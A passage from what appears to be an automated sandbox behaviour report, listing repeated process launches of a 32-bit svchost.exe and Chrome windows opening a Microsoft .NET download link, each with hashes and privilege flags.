                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                            Start time:12:43:25
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                            Start time:12:43:29
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                            Start time:12:43:29
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                            Start time:12:43:33
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                            Start time:12:43:33
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                            Start time:12:43:33
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                            Start time:12:43:36
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                            Start time:12:43:36
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                            Start time:12:43:40
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                            Start time:12:43:41
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                            Start time:12:43:41
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                            Start time:12:43:46
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                            Start time:12:43:46
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                            Start time:12:43:51
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                            Start time:12:43:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:85
                                                                                                                                                                                            Start time:12:43:52
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:86
                                                                                                                                                                                            Start time:12:43:55
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:87
                                                                                                                                                                                            Start time:12:43:55
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                            Start time:12:43:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                            Start time:12:43:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                            Start time:12:44:00
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                            Start time:12:44:04
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                            Start time:12:44:05
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                            Start time:12:44:09
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                            Start time:12:44:09
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                            Start time:12:44:09
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                            Start time:12:44:14
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                            Start time:12:44:14
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                            Start time:12:44:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                            Start time:12:44:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                            Start time:12:44:18
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                            Start time:12:44:21
                                                                                                                                                                                            Start date:04/01/2025
